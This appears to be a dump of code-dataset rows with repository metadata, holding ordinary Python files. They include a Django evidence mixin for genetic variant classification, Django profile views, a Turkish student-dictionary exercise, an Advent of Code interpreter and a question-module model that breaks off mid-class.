8: 'C_2', # 9: 'O_2', 10: 'C_2', 11: 'O_2', # 12: 'H_', 13: 'H_', 14: 'H_', # 15: 'H_', 16: 'H_', 17: 'H_', # }, # has_metal=False, # metal_ff=None, # ), # Assign the 
force field. | 2.143064 | 2 |
classification/models/evidence_mixin.py | SACGF/variantgrid | 5 | 6613985 | import re
from functools import total_ordering
from typing import Dict, Any, Mapping, Optional, Union, List, TypedDict
from django.conf import settings
from lazy import lazy
from annotation.models import Citation, CitationSource
from classification.enums import SpecialEKeys, CriteriaEvaluation
from genes.hgvs import CHGVS, PHGVS
from library.log_utils import report_message
from library.utils import empty_to_none
from snpdb.models import GenomeBuild
class VCDbRefDict(TypedDict, total=False):
    """A single external database reference attached to an evidence value."""
    id: str
    db: str
    idx: Union[str, int]
    url: str
    summary: str
    internal_id: int
class VCValidation(TypedDict, total=True):
    """A validation message (severity + code) attached to an evidence value."""
    severity: str
    code: str
    message: str
    options: Optional[Any]
class VCBlobDict(TypedDict, total=False):
    """The stored form of a single evidence entry: a value plus metadata."""
    value: Any
    note: str
    explain: str
    immutable: str
    db_refs: List[VCDbRefDict]
    validation: List[VCValidation]
# Aliases for the evidence store and patch shapes; a patch value of None
# means "delete this key entirely" (see EvidenceMixin.patch_with).
VCStoreValue = VCBlobDict
VCPatchValue = Union[None, VCStoreValue]
VCStore = Dict[str, VCStoreValue]
VCPatch = Dict[str, VCPatchValue]
@total_ordering
class CriteriaStrength:
    """An evidence key (criterion) paired with the strength applied to it.

    Instances are hashable, comparable for equality, and sortable: first by
    strength rank, then alphabetically by label.
    """

    @property
    def strength_value(self) -> int:
        """Rank of this strength within CriteriaEvaluation.ALL_STRENGTHS (0 if unknown)."""
        try:
            return CriteriaEvaluation.ALL_STRENGTHS.index(self.strength)
        except ValueError:
            # Unknown strengths sort first rather than raising.  (Previously
            # a bare ``except`` which also hid unrelated errors.)
            return 0

    def __init__(self, ekey: 'EvidenceKey', strength: Optional[str]):
        self.ekey = ekey
        # Fall back to the key's default evaluation when no strength is given.
        self.strength = strength or ekey.default_crit_evaluation

    def __str__(self) -> str:
        if self.ekey.namespace:
            # Namespaced (non-ACMG) criteria always show the full strength.
            return f'{self.ekey.pretty_label}_{self.strength}'
        if self.ekey.default_crit_evaluation == self.strength:
            # The default strength is implied, e.g. plain "PM1".
            return self.ekey.pretty_label
        criteria_first_letter = self.ekey.key[0].upper()
        suffix = self.strength
        # Avoid "PM1_PS"-style duplication: drop the leading B/P from the
        # suffix when it repeats the criterion's own first letter.
        if criteria_first_letter in {'B', 'P'} and suffix[0] == criteria_first_letter:
            suffix = suffix[1:]
        return f'{self.ekey.pretty_label}_{suffix}'

    def __eq__(self, other) -> bool:
        if not isinstance(other, CriteriaStrength):
            return False
        return self.ekey == other.ekey and self.strength == other.strength

    def __hash__(self):
        return hash(self.ekey) + hash(self.strength)

    def __lt__(self, other) -> bool:
        if not isinstance(other, CriteriaStrength):
            raise ValueError(f'Cannot sort CriteriaStrength and {other}')
        if self.strength_value == other.strength_value:
            # Same strength: fall back to alphabetical label order.
            return self.ekey.pretty_label < other.ekey.pretty_label
        return self.strength_value < other.strength_value
class EvidenceMixin:
    """
    For methods common between Classification and ClassificationModification
    Specifically anything that simply needs there to be a dictionary of evidence
    """

    @property
    def _evidence(self) -> VCStore:
        # Subclasses must override this to expose their evidence dictionary.
        raise NotImplementedError('EvidenceMixin must implement evidence_dict')

    @staticmethod
    def get_optional_value_from(evidence: dict, key: str):
        """Return the raw value stored under ``key``, or None if absent.

        Entries are normally blob dicts ({'value': ..., 'note': ...});
        a non-mapping entry is returned as-is.
        """
        if evidence is None:
            return None
        blob = evidence.get(key)
        if blob is None:
            return None
        if not isinstance(blob, Mapping):
            return blob
        return blob.get('value')

    def get(self, key: str, default=None):
        """``dict.get``-style access to this record's evidence values."""
        value = self.get_optional_value_from(self._evidence or {}, key)
        if value is None:
            return default
        return value

    def __getitem__(self, key: str):
        """``obj[key]``-style access; raises KeyError when no value exists."""
        value = self.get(key)
        if value is None:
            raise KeyError(f'No value for {key}')
        return value

    def get_genome_build(self) -> GenomeBuild:
        """Resolve this record's genome-build evidence to a GenomeBuild.

        :raises ValueError: if the key is missing or names an unknown build.
        """
        build_name: str
        try:
            build_name = self[SpecialEKeys.GENOME_BUILD]
        except KeyError:
            raise ValueError("Classification does not have a value for genome build")
        try:
            # Accepts aliases as well as canonical build names.
            return GenomeBuild.get_name_or_alias(build_name)
        except GenomeBuild.DoesNotExist:
            raise ValueError(f"Unsupported GenomeBuild {build_name}")

    @lazy
    def db_refs(self) -> List[Dict]:
        # Flattens every entry's 'db_refs' list into one list (cached by @lazy).
        all_db_refs = []
        for blob in self._evidence.values():
            db_refs = blob.get('db_refs')
            if db_refs:
                all_db_refs.extend(db_refs)
        return all_db_refs

    @property
    def citations(self) -> List[Citation]:
        """
        Returns the entire list of citations through the evidence
        :return: A list of Citations
        """
        citations = []
        for db_ref in self.db_refs:
            source = CitationSource.CODES.get(db_ref.get('db'))
            if source:
                # Creates the Citation row on first sight of this reference.
                citation, _ = Citation.objects.get_or_create(citation_source=source, citation_id=db_ref.get('idx'))
                citations.append(citation)
        return citations

    def criteria_strength_summary(self, ekeys: Optional['EvidenceKeyMap'] = None, only_acmg: bool = False) -> str:
        """Summarise the met criteria (e.g. "PVS1, PM2_PS"), sorted by strength.

        :param ekeys: key map to use; defaults to the cached instance
        :param only_acmg: when True, skip namespaced (non-ACMG) criteria
        """
        if ekeys is None:
            # Imported here to avoid a circular import with classification.models.
            from classification.models import EvidenceKeyMap
            ekeys = EvidenceKeyMap.instance()
        criteria: List[CriteriaStrength] = []
        for ek in ekeys.criteria():
            if only_acmg and ek.namespace:
                continue
            strength = self.get(ek.key)
            if CriteriaEvaluation.is_met(strength):  # exclude neutral, not met, not applicable
                criteria.append(CriteriaStrength(ek, strength))
        criteria.sort()
        return ", ".join([str(c) for c in criteria])

    @lazy
    def c_parts(self) -> CHGVS:
        # Parsed c.HGVS (cached); missing evidence parses as an empty CHGVS.
        return CHGVS(self.get(SpecialEKeys.C_HGVS) or "")

    @lazy
    def p_parts(self) -> PHGVS:
        # Parsed p.HGVS (cached); confirmation status is forced to False.
        return PHGVS.parse(self.get(SpecialEKeys.P_HGVS), override_is_confirmed_to=False)

    @property
    def transcript(self) -> Optional[str]:
        """
        Returns the transcript exactly how it was imported (don't bump versions even if it's correct to do so)
        :return:
        """
        if c_hgvs := self.get(SpecialEKeys.C_HGVS):
            parts = CHGVS(c_hgvs)
            if parts.transcript:
                return parts.transcript
        # Fall back to the dedicated transcript-id fields in the site's
        # configured preference order; each preference name is re-mapped to
        # the corresponding evidence key before lookup.
        for transcript_key in settings.VARIANT_ANNOTATION_TRANSCRIPT_PREFERENCES:
            transcript_key = {
                'lrg_identifier': SpecialEKeys.LRG_ID,
                'refseq_transcript_accession': SpecialEKeys.REFSEQ_TRANSCRIPT_ID,
                'ensembl_transcript_accession': SpecialEKeys.ENSEMBL_TRANSCRIPT_ID
            }.get(transcript_key)
            if transcript := self.get(transcript_key):
                return transcript
        # note old code would try to fix the transcript version of the record
        # but only if refseq_transcript_id and ensemble were blank
        """
        matcher = HGVSMatcher(self.get_genome_build())
        transcript_id = matcher.get_transcript_id(c_hgvs, transcript_version=True)
        if transcript_id:
            return transcript_id
        """
        return None

    def calc_clinical_significance_choice(self) -> Optional[str]:
        """Map the clinical-significance value to its 'vg' option code, if any."""
        cs = self.get(SpecialEKeys.CLINICAL_SIGNIFICANCE)
        if not cs:
            return None
        from classification.models import EvidenceKeyMap
        options = EvidenceKeyMap.cached_key(SpecialEKeys.CLINICAL_SIGNIFICANCE).matched_options(cs)
        if options:
            return options[0].get('vg')
        # Implicitly returns None when nothing matched.

    @staticmethod
    def _clean_key(key):
        """Normalise a raw key: lower-case, strip punctuation, snake_case."""
        key = str(key).lower()
        # Remove all non-word characters (everything except numbers and letters)
        key = re.sub(r"[^\w\s:]", ' ', key).strip()
        # Replace all runs of whitespace with a single underscore
        key = re.sub(r"\s+", '_', key)
        return key

    @staticmethod
    def to_patch(raw: Dict[str, Any]) -> VCPatch:
        """
        Cleans up a dictionary significantly ready for processing.
        Converts keys to numbers and letters, and all whitespace to underscores.
        For each entry in the source dict -
        * Converts Nones to dicts with None for all entries
        * Converts values to dicts with an entry of value (and None entries for note and explain)
        * Tidies Dicts to have all empty to none
        :param raw: A dictionary, presumably from JSON
        :return: A VCStore where all keys are clean str keys and all values are dicts
        """
        clean: VCPatch = {}
        for key, value_obj in raw.items():
            key = EvidenceMixin._clean_key(key)
            if key in clean:
                # Two raw keys collapsed to the same clean key; the later one wins.
                report_message(message=f'Multiple keys have been normalised to {key}',
                               extra_data={'raw_keys': list(raw.keys())},
                               level='warning')
            if value_obj is not None:
                if not isinstance(value_obj, Mapping):
                    # Bare value: wrap it into the standard blob shape.
                    value_obj = {"value": empty_to_none(value_obj), "note": None, "explain": None}
                else:
                    for attr_key, attr_value in value_obj.items():
                        value_obj[attr_key] = empty_to_none(attr_value)
            clean[key] = value_obj
        return clean

    @staticmethod
    def patch_with(target: dict, patch: dict, tidy_nones=False):
        """
        Update the evidence with normalised patch values.

        A None patch value deletes the key; a None sub-value deletes that
        attribute.  With tidy_nones=True, patched entries whose remaining
        attributes are all None are removed entirely.
        """
        for key, value in patch.items():
            # providing None means to wipe the whole object
            if value is None:
                target.pop(key, None)
            elif key not in target:
                target[key] = value
            else:
                existing = target[key]
                for sub_key, sub_value in value.items():
                    if sub_value is None:
                        existing.pop(sub_key, None)
                    else:
                        existing[sub_key] = sub_value
        if tidy_nones:
            for key in patch.keys():
                # Drop entries that ended up with every attribute set to None.
                if (blob := target.get(key)) and isinstance(blob, dict):
                    for value in blob.values():
                        if value is not None:
                            break
                    else:
                        target.pop(key, None)
| import re
from functools import total_ordering
from typing import Dict, Any, Mapping, Optional, Union, List, TypedDict
from django.conf import settings
from lazy import lazy
from annotation.models import Citation, CitationSource
from classification.enums import SpecialEKeys, CriteriaEvaluation
from genes.hgvs import CHGVS, PHGVS
from library.log_utils import report_message
from library.utils import empty_to_none
from snpdb.models import GenomeBuild
class VCDbRefDict(TypedDict, total=False):
    """A single external database reference attached to an evidence value."""
    id: str
    db: str
    idx: Union[str, int]
    url: str
    summary: str
    internal_id: int
class VCValidation(TypedDict, total=True):
    """A validation message (severity + code) attached to an evidence value."""
    severity: str
    code: str
    message: str
    options: Optional[Any]
class VCBlobDict(TypedDict, total=False):
    """The stored form of a single evidence entry: a value plus metadata."""
    value: Any
    note: str
    explain: str
    immutable: str
    db_refs: List[VCDbRefDict]
    validation: List[VCValidation]
# Aliases for the evidence store and patch shapes; a patch value of None
# means "delete this key entirely" (see EvidenceMixin.patch_with).
VCStoreValue = VCBlobDict
VCPatchValue = Union[None, VCStoreValue]
VCStore = Dict[str, VCStoreValue]
VCPatch = Dict[str, VCPatchValue]
@total_ordering
class CriteriaStrength:
    """An evidence key (criterion) paired with the strength applied to it.

    Instances are hashable, comparable for equality, and sortable: first by
    strength rank, then alphabetically by label.
    """

    @property
    def strength_value(self) -> int:
        """Rank of this strength within CriteriaEvaluation.ALL_STRENGTHS (0 if unknown)."""
        try:
            return CriteriaEvaluation.ALL_STRENGTHS.index(self.strength)
        except ValueError:
            # Unknown strengths sort first rather than raising.  (Previously
            # a bare ``except`` which also hid unrelated errors.)
            return 0

    def __init__(self, ekey: 'EvidenceKey', strength: Optional[str]):
        self.ekey = ekey
        # Fall back to the key's default evaluation when no strength is given.
        self.strength = strength or ekey.default_crit_evaluation

    def __str__(self) -> str:
        if self.ekey.namespace:
            # Namespaced (non-ACMG) criteria always show the full strength.
            return f'{self.ekey.pretty_label}_{self.strength}'
        if self.ekey.default_crit_evaluation == self.strength:
            # The default strength is implied, e.g. plain "PM1".
            return self.ekey.pretty_label
        criteria_first_letter = self.ekey.key[0].upper()
        suffix = self.strength
        # Avoid "PM1_PS"-style duplication: drop the leading B/P from the
        # suffix when it repeats the criterion's own first letter.
        if criteria_first_letter in {'B', 'P'} and suffix[0] == criteria_first_letter:
            suffix = suffix[1:]
        return f'{self.ekey.pretty_label}_{suffix}'

    def __eq__(self, other) -> bool:
        if not isinstance(other, CriteriaStrength):
            return False
        return self.ekey == other.ekey and self.strength == other.strength

    def __hash__(self):
        return hash(self.ekey) + hash(self.strength)

    def __lt__(self, other) -> bool:
        if not isinstance(other, CriteriaStrength):
            raise ValueError(f'Cannot sort CriteriaStrength and {other}')
        if self.strength_value == other.strength_value:
            # Same strength: fall back to alphabetical label order.
            return self.ekey.pretty_label < other.ekey.pretty_label
        return self.strength_value < other.strength_value
class EvidenceMixin:
    """
    For methods common between Classification and ClassificationModification
    Specifically anything that simply needs there to be a dictionary of evidence
    """

    @property
    def _evidence(self) -> VCStore:
        # Subclasses must override this to expose their evidence dictionary.
        raise NotImplementedError('EvidenceMixin must implement evidence_dict')

    @staticmethod
    def get_optional_value_from(evidence: dict, key: str):
        """Return the raw value stored under ``key``, or None if absent.

        Entries are normally blob dicts ({'value': ..., 'note': ...});
        a non-mapping entry is returned as-is.
        """
        if evidence is None:
            return None
        blob = evidence.get(key)
        if blob is None:
            return None
        if not isinstance(blob, Mapping):
            return blob
        return blob.get('value')

    def get(self, key: str, default=None):
        """``dict.get``-style access to this record's evidence values."""
        value = self.get_optional_value_from(self._evidence or {}, key)
        if value is None:
            return default
        return value

    def __getitem__(self, key: str):
        """``obj[key]``-style access; raises KeyError when no value exists."""
        value = self.get(key)
        if value is None:
            raise KeyError(f'No value for {key}')
        return value

    def get_genome_build(self) -> GenomeBuild:
        """Resolve this record's genome-build evidence to a GenomeBuild.

        :raises ValueError: if the key is missing or names an unknown build.
        """
        build_name: str
        try:
            build_name = self[SpecialEKeys.GENOME_BUILD]
        except KeyError:
            raise ValueError("Classification does not have a value for genome build")
        try:
            # Accepts aliases as well as canonical build names.
            return GenomeBuild.get_name_or_alias(build_name)
        except GenomeBuild.DoesNotExist:
            raise ValueError(f"Unsupported GenomeBuild {build_name}")

    @lazy
    def db_refs(self) -> List[Dict]:
        # Flattens every entry's 'db_refs' list into one list (cached by @lazy).
        all_db_refs = []
        for blob in self._evidence.values():
            db_refs = blob.get('db_refs')
            if db_refs:
                all_db_refs.extend(db_refs)
        return all_db_refs

    @property
    def citations(self) -> List[Citation]:
        """
        Returns the entire list of citations through the evidence
        :return: A list of Citations
        """
        citations = []
        for db_ref in self.db_refs:
            source = CitationSource.CODES.get(db_ref.get('db'))
            if source:
                # Creates the Citation row on first sight of this reference.
                citation, _ = Citation.objects.get_or_create(citation_source=source, citation_id=db_ref.get('idx'))
                citations.append(citation)
        return citations

    def criteria_strength_summary(self, ekeys: Optional['EvidenceKeyMap'] = None, only_acmg: bool = False) -> str:
        """Summarise the met criteria (e.g. "PVS1, PM2_PS"), sorted by strength.

        :param ekeys: key map to use; defaults to the cached instance
        :param only_acmg: when True, skip namespaced (non-ACMG) criteria
        """
        if ekeys is None:
            # Imported here to avoid a circular import with classification.models.
            from classification.models import EvidenceKeyMap
            ekeys = EvidenceKeyMap.instance()
        criteria: List[CriteriaStrength] = []
        for ek in ekeys.criteria():
            if only_acmg and ek.namespace:
                continue
            strength = self.get(ek.key)
            if CriteriaEvaluation.is_met(strength):  # exclude neutral, not met, not applicable
                criteria.append(CriteriaStrength(ek, strength))
        criteria.sort()
        return ", ".join([str(c) for c in criteria])

    @lazy
    def c_parts(self) -> CHGVS:
        # Parsed c.HGVS (cached); missing evidence parses as an empty CHGVS.
        return CHGVS(self.get(SpecialEKeys.C_HGVS) or "")

    @lazy
    def p_parts(self) -> PHGVS:
        # Parsed p.HGVS (cached); confirmation status is forced to False.
        return PHGVS.parse(self.get(SpecialEKeys.P_HGVS), override_is_confirmed_to=False)

    @property
    def transcript(self) -> Optional[str]:
        """
        Returns the transcript exactly how it was imported (don't bump versions even if it's correct to do so)
        :return:
        """
        if c_hgvs := self.get(SpecialEKeys.C_HGVS):
            parts = CHGVS(c_hgvs)
            if parts.transcript:
                return parts.transcript
        # Fall back to the dedicated transcript-id fields in the site's
        # configured preference order; each preference name is re-mapped to
        # the corresponding evidence key before lookup.
        for transcript_key in settings.VARIANT_ANNOTATION_TRANSCRIPT_PREFERENCES:
            transcript_key = {
                'lrg_identifier': SpecialEKeys.LRG_ID,
                'refseq_transcript_accession': SpecialEKeys.REFSEQ_TRANSCRIPT_ID,
                'ensembl_transcript_accession': SpecialEKeys.ENSEMBL_TRANSCRIPT_ID
            }.get(transcript_key)
            if transcript := self.get(transcript_key):
                return transcript
        # note old code would try to fix the transcript version of the record
        # but only if refseq_transcript_id and ensemble were blank
        """
        matcher = HGVSMatcher(self.get_genome_build())
        transcript_id = matcher.get_transcript_id(c_hgvs, transcript_version=True)
        if transcript_id:
            return transcript_id
        """
        return None

    def calc_clinical_significance_choice(self) -> Optional[str]:
        """Map the clinical-significance value to its 'vg' option code, if any."""
        cs = self.get(SpecialEKeys.CLINICAL_SIGNIFICANCE)
        if not cs:
            return None
        from classification.models import EvidenceKeyMap
        options = EvidenceKeyMap.cached_key(SpecialEKeys.CLINICAL_SIGNIFICANCE).matched_options(cs)
        if options:
            return options[0].get('vg')
        # Implicitly returns None when nothing matched.

    @staticmethod
    def _clean_key(key):
        """Normalise a raw key: lower-case, strip punctuation, snake_case."""
        key = str(key).lower()
        # Remove all non-word characters (everything except numbers and letters)
        key = re.sub(r"[^\w\s:]", ' ', key).strip()
        # Replace all runs of whitespace with a single underscore
        key = re.sub(r"\s+", '_', key)
        return key

    @staticmethod
    def to_patch(raw: Dict[str, Any]) -> VCPatch:
        """
        Cleans up a dictionary significantly ready for processing.
        Converts keys to numbers and letters, and all whitespace to underscores.
        For each entry in the source dict -
        * Converts Nones to dicts with None for all entries
        * Converts values to dicts with an entry of value (and None entries for note and explain)
        * Tidies Dicts to have all empty to none
        :param raw: A dictionary, presumably from JSON
        :return: A VCStore where all keys are clean str keys and all values are dicts
        """
        clean: VCPatch = {}
        for key, value_obj in raw.items():
            key = EvidenceMixin._clean_key(key)
            if key in clean:
                # Two raw keys collapsed to the same clean key; the later one wins.
                report_message(message=f'Multiple keys have been normalised to {key}',
                               extra_data={'raw_keys': list(raw.keys())},
                               level='warning')
            if value_obj is not None:
                if not isinstance(value_obj, Mapping):
                    # Bare value: wrap it into the standard blob shape.
                    value_obj = {"value": empty_to_none(value_obj), "note": None, "explain": None}
                else:
                    for attr_key, attr_value in value_obj.items():
                        value_obj[attr_key] = empty_to_none(attr_value)
            clean[key] = value_obj
        return clean

    @staticmethod
    def patch_with(target: dict, patch: dict, tidy_nones=False):
        """
        Update the evidence with normalised patch values.

        A None patch value deletes the key; a None sub-value deletes that
        attribute.  With tidy_nones=True, patched entries whose remaining
        attributes are all None are removed entirely.
        """
        for key, value in patch.items():
            # providing None means to wipe the whole object
            if value is None:
                target.pop(key, None)
            elif key not in target:
                target[key] = value
            else:
                existing = target[key]
                for sub_key, sub_value in value.items():
                    if sub_value is None:
                        existing.pop(sub_key, None)
                    else:
                        existing[sub_key] = sub_value
        if tidy_nones:
            for key in patch.keys():
                # Drop entries that ended up with every attribute set to None.
                if (blob := target.get(key)) and isinstance(blob, dict):
                    for value in blob.values():
                        if value is not None:
                            break
                    else:
                        target.pop(key, None)
| en | 0.82934 | For methods common between Classification and ClassificationModification Specifically anything that simply needs there to be a dictionary of evidence Returns the entire list of citations through the evidence :return: A list of Citations # exclude neutral, not met, not applicable Returns the transcript exactly how it was imported (don't bump versions even if it's correct to do so) :return: # note old code would try to fix the transcript version of the record # but only if refseq_transcript_id and ensemble were blank matcher = HGVSMatcher(self.get_genome_build()) transcript_id = matcher.get_transcript_id(c_hgvs, transcript_version=True) if transcript_id: return transcript_id # Remove all non-word characters (everything except numbers and letters) # Replace all runs of whitespace with a single underscore Cleans up a dictionary significantly ready for processing. Converts keys to numbers and letters, and all whitespace to underscores. For each entry in the source dict - * Converts Nones to dicts with None for all entries * Converts values to dicts with an entry of value (and None entries for note and explain) * Tidies Dicts to have all empty to none :param raw: A dictionary, presumably from JSON :return: A VCStore where all keys are clean str keys and all values are dicts Update the evidence with normalised patch values. # providing None means to wipe the whole object | 1.987213 | 2 |
oauth/users/views.py | lichaoxiang/My-Django-Allauth | 1 | 6613986 | from django.shortcuts import render, redirect
from django.contrib.auth.decorators import login_required
from django.contrib import messages
from .models import UserProfile
from .forms import ProfileForm
@login_required
def profile(request):
'''展示个人资料'''
user = request.user
return render(request, 'users/profile.html', {'user':user})
@login_required
def change_profile(request):
'''更新个人资料'''
if request.method == 'POST':
# instance参数表示用model实例来初始化表单,这样就可以达到通过表单来更新数据
form = ProfileForm(request.POST, instance=request.user)
if form.is_valid():
form.save()
# 添加一条信息,表单验证成功就重定向到个人信息页面
messages.add_message(request, messages.SUCCESS, '个人信息更新成功!')
return redirect('users:profile')
else:
# 不是POST请求就返回空表单
form = ProfileForm(instance=request.user)
return render(request, 'users/change_profile.html', context={'form': form}) | from django.shortcuts import render, redirect
from django.contrib.auth.decorators import login_required
from django.contrib import messages
from .models import UserProfile
from .forms import ProfileForm
@login_required
def profile(request):
'''展示个人资料'''
user = request.user
return render(request, 'users/profile.html', {'user':user})
@login_required
def change_profile(request):
'''更新个人资料'''
if request.method == 'POST':
# instance参数表示用model实例来初始化表单,这样就可以达到通过表单来更新数据
form = ProfileForm(request.POST, instance=request.user)
if form.is_valid():
form.save()
# 添加一条信息,表单验证成功就重定向到个人信息页面
messages.add_message(request, messages.SUCCESS, '个人信息更新成功!')
return redirect('users:profile')
else:
# 不是POST请求就返回空表单
form = ProfileForm(instance=request.user)
return render(request, 'users/change_profile.html', context={'form': form}) | zh | 0.941234 | 展示个人资料 更新个人资料 # instance参数表示用model实例来初始化表单,这样就可以达到通过表单来更新数据 # 添加一条信息,表单验证成功就重定向到个人信息页面 # 不是POST请求就返回空表单 | 2.155741 | 2 |
PYTHON/Objects and data structures/dictionary-demo.py | YakazaSTG/Python-Basics | 0 | 6613987 | <reponame>YakazaSTG/Python-Basics<gh_stars>0
'''
ogrenciler = {
'120': {
'ad': 'Ali',
'soyad': 'Yılmaz',
'telefon': '532 000 00 01'
},
'125': {
'ad': 'Can',
'soyad': 'Korkmaz',
'telefon': '532 000 00 02'
},
'128': {
'ad': 'Volkan',
'soyad': 'Yükselen',
'telefon': '532 000 00 03'
},
}
1- Bilgileri verilen öğrencileri kullanıcıdan aldığınız bilgilerle
dictionary içinde saklayınız.
2- Öğrenci numarasını kullanıcıdan alıp ilgili öğrenci bilgisini gösterin.
'''
ogrenciler = {}
number = input("öğrenci no: ")
name = input("öğrenci adı: ")
surname = input("öğrenci soyad: ")
phone = input("öğrenci telefon ")
# ogrenciler[number] = {
# 'ad': name,
# 'soyad': surname,
# 'telefon': phone
# }
ogrenciler.update({
number: {
'ad': name,
'soyad': surname,
'telefon': phone
}
})
number = input("öğrenci no: ")
name = input("öğrenci adı: ")
surname = input("öğrenci soyad: ")
phone = input("öğrenci telefon ")
ogrenciler.update({
number: {
'ad': name,
'soyad': surname,
'telefon': phone
}
})
number = input("öğrenci no: ")
name = input("öğrenci adı: ")
surname = input("öğrenci soyad: ")
phone = input("öğrenci telefon: ")
ogrenciler.update({
number: {
'ad': name,
'soyad': surname,
'telefon': phone
}
})
print('*'*50)
print(ogrenciler)
ogrNo = input('öğrenci no: ')
ogrenci = ogrenciler[ogrNo]
print(f"Aradığınız {ogrNo} nolu öğrencinin adı: {ogrenci['ad']} soyadı: {ogrenci['soyad']} ve telefonu {ogrenci['telefon']}") | '''
ogrenciler = {
'120': {
'ad': 'Ali',
'soyad': 'Yılmaz',
'telefon': '532 000 00 01'
},
'125': {
'ad': 'Can',
'soyad': 'Korkmaz',
'telefon': '532 000 00 02'
},
'128': {
'ad': 'Volkan',
'soyad': 'Yükselen',
'telefon': '532 000 00 03'
},
}
1- Bilgileri verilen öğrencileri kullanıcıdan aldığınız bilgilerle
dictionary içinde saklayınız.
2- Öğrenci numarasını kullanıcıdan alıp ilgili öğrenci bilgisini gösterin.
'''
ogrenciler = {}
number = input("öğrenci no: ")
name = input("öğrenci adı: ")
surname = input("öğrenci soyad: ")
phone = input("öğrenci telefon ")
# ogrenciler[number] = {
# 'ad': name,
# 'soyad': surname,
# 'telefon': phone
# }
ogrenciler.update({
number: {
'ad': name,
'soyad': surname,
'telefon': phone
}
})
number = input("öğrenci no: ")
name = input("öğrenci adı: ")
surname = input("öğrenci soyad: ")
phone = input("öğrenci telefon ")
ogrenciler.update({
number: {
'ad': name,
'soyad': surname,
'telefon': phone
}
})
number = input("öğrenci no: ")
name = input("öğrenci adı: ")
surname = input("öğrenci soyad: ")
phone = input("öğrenci telefon: ")
ogrenciler.update({
number: {
'ad': name,
'soyad': surname,
'telefon': phone
}
})
print('*'*50)
print(ogrenciler)
ogrNo = input('öğrenci no: ')
ogrenci = ogrenciler[ogrNo]
print(f"Aradığınız {ogrNo} nolu öğrencinin adı: {ogrenci['ad']} soyadı: {ogrenci['soyad']} ve telefonu {ogrenci['telefon']}") | tr | 0.897995 | ogrenciler = { '120': { 'ad': 'Ali', 'soyad': 'Yılmaz', 'telefon': '532 000 00 01' }, '125': { 'ad': 'Can', 'soyad': 'Korkmaz', 'telefon': '532 000 00 02' }, '128': { 'ad': 'Volkan', 'soyad': 'Yükselen', 'telefon': '532 000 00 03' }, } 1- Bilgileri verilen öğrencileri kullanıcıdan aldığınız bilgilerle dictionary içinde saklayınız. 2- Öğrenci numarasını kullanıcıdan alıp ilgili öğrenci bilgisini gösterin. # ogrenciler[number] = { # 'ad': name, # 'soyad': surname, # 'telefon': phone # } | 3.271164 | 3 |
8/solution.py | ofloveandhate/advent_of_code_2020 | 0 | 6613988 | <reponame>ofloveandhate/advent_of_code_2020
def read_data():
with open ('input.txt') as f:
data = f.readlines()
return [d.strip() for d in data]
def write_data(data):
with open('output.txt','w') as f:
for d in data:
f.write(str(d)+'\n')
###
def part1():
data = read_data()
acc = 0
counts = set()
line = 0
while True:
if line in counts:
return acc
instr = data[line]
counts.add(line)
op, val = instr.split()
if op=="nop":
line = line+1
elif op=="acc":
acc = acc+int(val)
line = line+1
elif op=="jmp":
line = line+int(val)
###
def run_that_shit(data):
acc = 0
counts = set()
line = 0
while True:
if line in counts:
raise ValueError("duplicate instruction encountered")
try:
instr = data[line]
except:
return acc
counts.add(line)
op, val = instr.split()
if op=="nop":
line = line+1
elif op=="acc":
acc = acc+int(val)
line = line+1
elif op=="jmp":
line = line+int(val)
return acc
def mod_data(data, line):
modded = data.copy()
instr = data[line]
op, val = instr.split()
print(instr)
if op=='nop':
modded[line] = f"jmp {val}"
elif op=='jmp':
modded[line] = f"nop {val}"
else:
raise ValueError(f"line {line} not a candidate")
return modded
def part2():
data = read_data()
line = 0
while True:
try:
return run_that_shit(mod_data(data,line))
except ValueError as e:
line = line+1
print("part 1: {}".format(part1()))
print("part 2: {}".format(part2()))
| def read_data():
with open ('input.txt') as f:
data = f.readlines()
return [d.strip() for d in data]
def write_data(data):
with open('output.txt','w') as f:
for d in data:
f.write(str(d)+'\n')
###
def part1():
data = read_data()
acc = 0
counts = set()
line = 0
while True:
if line in counts:
return acc
instr = data[line]
counts.add(line)
op, val = instr.split()
if op=="nop":
line = line+1
elif op=="acc":
acc = acc+int(val)
line = line+1
elif op=="jmp":
line = line+int(val)
###
def run_that_shit(data):
acc = 0
counts = set()
line = 0
while True:
if line in counts:
raise ValueError("duplicate instruction encountered")
try:
instr = data[line]
except:
return acc
counts.add(line)
op, val = instr.split()
if op=="nop":
line = line+1
elif op=="acc":
acc = acc+int(val)
line = line+1
elif op=="jmp":
line = line+int(val)
return acc
def mod_data(data, line):
modded = data.copy()
instr = data[line]
op, val = instr.split()
print(instr)
if op=='nop':
modded[line] = f"jmp {val}"
elif op=='jmp':
modded[line] = f"nop {val}"
else:
raise ValueError(f"line {line} not a candidate")
return modded
def part2():
data = read_data()
line = 0
while True:
try:
return run_that_shit(mod_data(data,line))
except ValueError as e:
line = line+1
print("part 1: {}".format(part1()))
print("part 2: {}".format(part2())) | none | 1 | 3.369952 | 3 | |
module_question/models.py | NicolasMuras/Lookdaluv | 1 | 6613989 | from django.db import models
from simple_history.models import HistoricalRecords
from core.models import BaseModel
from modules.models import Module
class QuestionModule(Module):
class Difficult(models.IntegerChoices):
VERY_EASY = 1, "Very Easy"
EASY = 2, "Easy"
MEDIUM = 3, "Medium"
HARD = 4, "Hard"
VERY_HARD = 5, "Very Hard"
NIGHTMARE = 6, "Nightmare"
difficult = models.PositiveSmallIntegerField(
'Difficult',
choices=Difficult.choices,
default=Difficult.MEDIUM
)
level_steps = models.IntegerField(default=10)
historical = HistoricalRecords()
@property
def _history_user(self):
return self.changed_by
@_history_user.setter
def _history_user(self, value):
self.changed_by = value
class Meta:
verbose_name = 'Question Module'
verbose_name_plural = 'Question Modules'
def __str__(self):
return self.title
class QuestionModuleStatistics(BaseModel):
module = models.ForeignKey(QuestionModule, on_delete=models.CASCADE, verbose_name='Module', related_name='statistics')
completed = models.BooleanField(blank=False, null=False, default=False)
max_step_reached = models.IntegerField(default=1)
value_generated = models.IntegerField(default=1)
trap_passed = models.BooleanField(blank=True, null=False, default=False)
historical = HistoricalRecords()
@property
def _history_user(self):
return self.changed_by
@_history_user.setter
def _history_user(self, value):
self.changed_by = value
class Meta:
verbose_name = 'Question Statistic'
verbose_name_plural = 'Question Statistics'
def __str__(self):
return self.module.title | from django.db import models
from simple_history.models import HistoricalRecords
from core.models import BaseModel
from modules.models import Module
class QuestionModule(Module):
class Difficult(models.IntegerChoices):
VERY_EASY = 1, "Very Easy"
EASY = 2, "Easy"
MEDIUM = 3, "Medium"
HARD = 4, "Hard"
